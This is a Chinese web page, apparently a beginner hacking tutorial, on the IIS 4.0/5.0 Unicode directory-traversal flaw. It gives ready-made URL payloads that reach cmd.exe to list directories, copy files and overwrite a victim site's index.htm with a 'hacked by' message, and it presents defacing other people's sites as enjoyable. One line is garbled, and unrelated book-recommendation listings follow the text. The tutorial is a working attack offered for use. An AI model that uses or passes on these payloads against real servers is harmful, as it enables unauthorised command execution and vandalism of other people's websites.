登陆注册
178000000006

黑客初级技术讲解(下续二)

基础知识(2)

今天我们谈谈unicode漏洞,这可是基础中的基础,重点里的重点,不懂的一定要好好学。

2000年10月17日中联绿盟发布了以下的安全公告:

微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

远程漏洞:是

本地漏洞:是

发布日期:2000年10月17日

更新日期:2000年10月17日

受影响的版本:

Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

这可是中国乃至全球网络安全界的一次大变节,入侵nt/2000系统变得如此简单,不打补丁的死路一条。

下面开始正式学习:

一,UNICODE漏洞的原理

此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 中国台湾繁体中文也同样存在这样的漏洞。

中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中

%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ’/’

%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ’\’

在NT4中/编码为%c1%9c

在英文版里: WIN2000英文版%c0%af

在中文win2k里:%c1%1c

此外还有多种编码,不一一阐述。

本文例子均以win2k为准,其他类型请自行替换。

基础知识(3)

二,一切从基础开始

由于winnt\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。

如果成功,那么在浏览区可看到如下信息:

Directory of C:\inetpub\scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)

是不是有自己机器的感觉了,正点!就是这种感觉!

cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!

http://11.11.22.22/msadc/..%c1%1 ... em32/cmd.exe?/c+dir (这个命令同样道理)

大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

会dos的朋友一定懂其意义了,不懂的请去看书 .

不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!

三,实战演练

1,修改主页!(是不是很爽?)

一般主页位置在c:\inetpub\wwwroot下,但要是改了路径,就需要找找了。

最方便的方法:在浏览器里输入 http://11.11.22.22/.ida要是有漏洞,那在浏?..皇俏颐堑氖籽 ?/a>

分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。

dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。

找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm

那么我们就修改它吧!

最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

回应为:HTTP 500 - 内部服务器错误

通过对cmd的分析,袁哥得出一条简便的方法,加入符号

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

回应为:cgi错误,不用理会

两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧

而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo

例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页

同类推荐
  • 演讲的艺术
  • 孩子一生最受用的40种能力

    孩子一生最受用的40种能力

    尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!本书作者提出的40种能力,对孩子在未来生活中的竞争力是不可缺少的,并相应的为家长提供实际的方法和原则,帮助父母在家庭生活中,如何和孩子共同培养这些能力,开启孩子生命中的优势密码。能力关乎孩子的一生,可以让孩子受益一生,从小培养孩子一生最受用的40种能力,它不仅可以开发孩子的才能和潜力,使其身心得到全面成长与成熟,还能把孩子培养成一个乐观、健康、全面发展的优秀人才。
  • 看穿人心术,拿来就用

    看穿人心术,拿来就用

    如果能掌握“看穿人心术”,人与人之间的沟通会更有效。本书要为您揭晓的“秘术”有:从弦外之音看人际关系、从外表和动作看本性、听到哪些话值得注意、从口头禅看相处之道、从不同的借口洞悉性格等。只要勤加“修炼”,谁都可以更有心机和技巧地处理好人际关系,让家庭更和睦、让工作环境更舒适。尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!
  • 告诉孩子钱该怎么花

    告诉孩子钱该怎么花

    尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!本书是青少年金钱和理财知识教育的实用读本,从介绍、分析中国孩子目前普通存在的错误金钱观和不合理消费行为开始,根据孩子不同年龄段的心智和行为能力水平,为如何开展并实施理财教育,提供了一系列细致的理论和实用的方法指导。
  • 中国家庭教育缺什么

    中国家庭教育缺什么

    尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!这是中国第一本全方位解读中国家庭教育缺陷的经典范本!家庭教育改革是一个艰难的过程,在这个过程里,我们的行为模式莫不发生着改变。而有关这一过程的探寻,在世人的眼中自然有指点迷津的价值。我们找到的欠缺之处,足以让我们的家长站在某种高度上看到时代的变迁。在本书中,作者以亲切睿智的语言,通过一些真实性案例,深入浅出,娓娓道来许多家庭教育中存在的基本问题,它给孩子们的伟大前程提供了一份行动指南,也给望子成龙、望女成凤的父母们带来了最直观、最有效的经验指导。本书是为众多茫然无助的家长而倾心打造的鼎立之作。祝你开卷有益,与孩子在本书的指引下,共同走出教育的误区,建构美好、幸福、快乐的人生!
热门推荐
  • 袋国风云之碧雪阁

    袋国风云之碧雪阁

    命运能带给我们什么。是时事成就英雄,还是英雄造就时事?然而命运之轮已经远去,剩下的一切,都只是镜中月,指间沙......
  • 龙吟虎啸

    龙吟虎啸

    人间遭受十年魔难,佛祖将魔王封于东皇钟内。千载之后,神州大地群雄逐鹿。魔王逃出东皇钟……
  • 百分之三十

    百分之三十

    入狱前一晚是有意还是自大妄为,在狱中偶遇是刻意安排还是冥冥注定,当他习惯了收割生命的时候,是否还记得曾经初出茅庐的自己,当他习惯心脏的疼痛,是否还记得曾经自如的自己,当他用双肩扛起责任,是否还记得曾经怕认真的自己,接受实验,究竟对还是错,或许会后悔,但是日子最终还是要过
  • 穿越之绝色萌妃萌翻天

    穿越之绝色萌妃萌翻天

    一个你想不到的世界,许多让你爆笑的故事。我堂堂一个二十一世纪的龙头杀人,一朝穿越成了一个三岁大的奶娃娃,手无寸铁之力,任人宰割,这要是传出去了,还不被他们笑话。待我长大后,幻术,灵力,不在话下!神兽,丹药,信手捻来!诶!!这个男人是怎么回事?干嘛抱着我不放!哎!哎!哎!你想要带我去哪!!诶!这不是我的房间吗?!你!你!想干嘛?!啊!!!!
  • 生逢穿越季

    生逢穿越季

    炎彬,原本是一个普通的学生。奈何命运驱使,今生注定要与穿越结缘。从此踏上惊奇之旅,与异能者、阴谋家、暗战者同行。权力充满污秽、黄金污浊眼睛、美女暗藏杀机。他将如何斩断诱惑,突破自我。一切尽在生逢穿越季。感谢阅文书评团提供书评支持。
  • 这是个革命的时代

    这是个革命的时代

    因特殊的原因,小白的灵魂附在了一个重伤濒死的杀手身上,来到了十三世纪末的欧洲。但是这欧洲却和他所了解的欧洲不一样,有斗气,有魔法……是一个奇幻世界,也是个肮脏的世界。他要活下去!改变这个世界!这,是个革命的时代!
  • 豪门天才

    豪门天才

    豪门天才,一朝落难。功法资源全都有,武技丹药不能停!且看豪门天才从零开始,称霸九州。
  • EXO星之路

    EXO星之路

    这本小说是上一本小说的内容,上一本才更了六章,点头ing人物会发生变化艺名也会变化ing欢迎观看
  • 网王之面具脱落

    网王之面具脱落

    她现世网球职业高手,黑带、跆拳道、柔道样样精通。穿越后却被人所误,看她如何打破局面,散发光芒,又如何的脱落,那比钻石还坚硬的面具......
  • TFBOYS十年永相伴

    TFBOYS十年永相伴

    三只和三位身世显赫的女生在大学发生了什么事情?结局又如何?(本书的内容纯属虚构,请四叶草不要当真)